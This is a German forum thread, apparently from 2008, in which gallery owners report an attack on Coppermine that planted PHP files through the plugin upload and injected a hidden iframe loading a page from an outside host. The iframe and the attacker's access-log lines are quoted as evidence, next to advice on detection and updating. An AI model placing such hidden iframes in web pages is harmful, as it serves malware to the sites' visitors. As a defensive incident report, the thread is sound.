SonyUserforum - Coppermine-Gallery gehackt? Schaut lieber mal nach...

baerlichkeit · 14.04.2008, 08:14

Hiho,
heute morgen hatte ich eine etwas unerfreuliche mail von Kerstin in meinem Postfach, Antivir fand mit der Heuristik (mein NOD blieb still

) ein Problem in meiner Coppermine-Galerie => html/infected.webpage.gen.

Wie sich herausgestellt hat, wurde in drei PHP-Seiten (und das beunruhigt mich dann doch

) ein Iframe an den Anfang gesetzt.

Code:

<iframe style="display: none" src="http://caatadgouk.com/dl/adv436.php" width="1" height="1"></iframe>

Diese Art von Hack scheint was ganz frisches zu sein, ich kann mir absolut nicht erklären wo der herkommt.

Siehe dazu auch den Thread im Coppermine-Forum.

http://forum.coppermine-gallery.net/...c,51671.0.html

Also, Leute die Coppermine haben sollten mal schauen...

Edit: ne neue Version von Coppermine soll das Problem beseitigen. Hilft aber nicht, wenn es schon passiert ist

Trotzdem, man sollte unbedingt updaten, vor allem wenn man bisher verschont wurde!
http://forum.coppermine-gallery.net/...c,51787.0.html

Viele Grüße
Andreas

JoeJung · 14.04.2008, 09:33

Hallo Andreas,

vielen Dank für die Info - dann werde ich mal updaten. Wie merke ich, dass die Galerie bereits befallen ist? Beim Besuch bekomme ich von meinem Antivirusprogramm keine Fehlermeldungen.

Ich lade mal sämtliche PHP-Files vom Server runter und vergleiche sie mit den Original-Installationsdateien. Dann müsste ich merken, ob was geändert wurde.

Lg. Josef

baerlichkeit · 14.04.2008, 09:39

Hallo Josef,
im Quellcode der generierten Seite schauen, ob da irgendwo ein ominöses Iframe auftaucht.

Bei mir (und den anderen wohl auch) ist folgendes passiert:

Heute Nacht ein Angriff, bei dem über eine Lücke im Upload-Teil der CPG eine Datei ins Plugin-Verzeichnis geladen wurde. (es gab auch Fälle in denen php-Dateien als zip/jpg ins Album Verzeichnis gepackt wurden)

Code:

91.78.72.131 - - [13/Apr/2008:16:19:45 +0200] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 24245 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:46 +0200] "GET /pluginmgr.php HTTP/1.1" 200 24217 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:47 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:56 +0200] "GET /plugins/zacosmall.php HTTP/1.1" 200 5047 "-" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:57 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:59 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 26145 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:00 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:07 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 19002 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:07 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:12 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 2037 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"

Dieses zacosmall.php hat dann wohl die Dateien verändert. Zum Glück bei mir nur drei Stück, der Rest meines Webspaces scheint unberührt...

Logs durchstöbern und nach der upload-Funktion suchen hat bei mir den Zugriff gezeigt.

Blackmike · 14.04.2008, 10:12

Da bei mir auch Coppermine läuft, welche Version hast du?

baerlichkeit · 14.04.2008, 10:14

Ich hatte die 1.4.16, also die bis dato neuste.
Eben auf die 1.4.17 upgedatet... läuft wieder, bis jetzt noch nicht neu gehackt, mal abwarten

Blackmike · 14.04.2008, 10:23

ätz, werd ich wohl auch machen müssen.... da werd ich mir beim bridgen ja wieder die finger brechen

baerlichkeit · 14.04.2008, 10:25

Na ja Black,
besser jetzt, als wenn es zu spät ist

Bei mir hatte der Schadenscode zum Glück nur drei PHP-Dateien verändert, was man so liest, sind mitunter ganze Webserver betroffen und in allen PHP/HTML-Dateien steht dieser Ifram-Mist.

Viel Spaß

Somnium · 14.04.2008, 10:27

Danke für die Info, ich hab nun einfach mal ne alte, brachliegende Coppermine Galerie die ich noch auf ner subdomain hatte entsorgt. Was es nicht gibt braucht nicht gepflegt und geupdated zu werden, kann dafür aber auch nicht gehackt werden.

JoeJung · 14.04.2008, 20:33

Heute wurde noch einmal eine Bugfix-Version 1.4.18 nachgelegt. Ich muss gestehen, dass ich mit dem Aktualisieren etwas nachlässig war und noch bis heute 1.4.14 verwendet habe. Werde jetzt aber regelmäßig updaten ...

Lg. Josef

Gotico · 14.04.2008, 21:10

1.4.18 habe ich heute über die 1.4.16 drübergebügelt. Läuft ohne Probleme

See ya, Maic.

14.04.2008, 08:14	#1
baerlichkeit Registriert seit: 03.11.2006 Ort: Berlin Beiträge: 11.088	Coppermine-Gallery gehackt? Schaut lieber mal nach... Hiho, heute morgen hatte ich eine etwas unerfreuliche mail von Kerstin in meinem Postfach, Antivir fand mit der Heuristik (mein NOD blieb still ) ein Problem in meiner Coppermine-Galerie => html/infected.webpage.gen. Wie sich herausgestellt hat, wurde in drei PHP-Seiten (und das beunruhigt mich dann doch ) ein Iframe an den Anfang gesetzt. Code: <iframe style="display: none" src="http://caatadgouk.com/dl/adv436.php" width="1" height="1"></iframe> Diese Art von Hack scheint was ganz frisches zu sein, ich kann mir absolut nicht erklären wo der herkommt. Siehe dazu auch den Thread im Coppermine-Forum. http://forum.coppermine-gallery.net/...c,51671.0.html Also, Leute die Coppermine haben sollten mal schauen... Edit: ne neue Version von Coppermine soll das Problem beseitigen. Hilft aber nicht, wenn es schon passiert ist Trotzdem, man sollte unbedingt updaten, vor allem wenn man bisher verschont wurde! http://forum.coppermine-gallery.net/...c,51787.0.html Viele Grüße Andreas __________________ abgedunkelt.de Geändert von baerlichkeit (14.04.2008 um 08:54 Uhr)

14.04.2008, 09:33	#2
JoeJung Registriert seit: 08.09.2004 Ort: A-Nebelberg Beiträge: 1.649	Hallo Andreas, vielen Dank für die Info - dann werde ich mal updaten. Wie merke ich, dass die Galerie bereits befallen ist? Beim Besuch bekomme ich von meinem Antivirusprogramm keine Fehlermeldungen. Ich lade mal sämtliche PHP-Files vom Server runter und vergleiche sie mit den Original-Installationsdateien. Dann müsste ich merken, ob was geändert wurde. Lg. Josef __________________ JoeJung Meine Bilder in der FC

14.04.2008, 10:14	#5
baerlichkeit Themenersteller Registriert seit: 03.11.2006 Ort: Berlin Beiträge: 11.088	Ich hatte die 1.4.16, also die bis dato neuste. Eben auf die 1.4.17 upgedatet... läuft wieder, bis jetzt noch nicht neu gehackt, mal abwarten __________________ abgedunkelt.de

14.04.2008, 10:25	#7
baerlichkeit Themenersteller Registriert seit: 03.11.2006 Ort: Berlin Beiträge: 11.088	Na ja Black, besser jetzt, als wenn es zu spät ist Bei mir hatte der Schadenscode zum Glück nur drei PHP-Dateien verändert, was man so liest, sind mitunter ganze Webserver betroffen und in allen PHP/HTML-Dateien steht dieser Ifram-Mist. Viel Spaß __________________ abgedunkelt.de

14.04.2008, 20:33	#9
JoeJung Registriert seit: 08.09.2004 Ort: A-Nebelberg Beiträge: 1.649	Heute wurde noch einmal eine Bugfix-Version 1.4.18 nachgelegt. Ich muss gestehen, dass ich mit dem Aktualisieren etwas nachlässig war und noch bis heute 1.4.14 verwendet habe. Werde jetzt aber regelmäßig updaten ... Lg. Josef __________________ JoeJung Meine Bilder in der FC

14.04.2008, 10:12	#4
Blackmike Registriert seit: 24.08.2005 Ort: Im schönen NRW Beiträge: 1.953	Da bei mir auch Coppermine läuft, welche Version hast du?

14.04.2008, 10:23	#6
Blackmike Registriert seit: 24.08.2005 Ort: Im schönen NRW Beiträge: 1.953	ätz, werd ich wohl auch machen müssen.... da werd ich mir beim bridgen ja wieder die finger brechen

14.04.2008, 10:27	#8
Somnium Registriert seit: 10.11.2005 Beiträge: 4.249	Danke für die Info, ich hab nun einfach mal ne alte, brachliegende Coppermine Galerie die ich noch auf ner subdomain hatte entsorgt. Was es nicht gibt braucht nicht gepflegt und geupdated zu werden, kann dafür aber auch nicht gehackt werden.

14.04.2008, 21:10	#10
Gotico Registriert seit: 10.06.2004 Beiträge: 5.296	1.4.18 habe ich heute über die 1.4.16 drübergebügelt. Läuft ohne Probleme See ya, Maic. __________________ Sensorart \| 1001 Cars - Cars, Bikes & Rockabilly \| Mein Profil in der FC \| FreiesFotoForum

Sponsored Links

Sponsored Links

Sponsored Links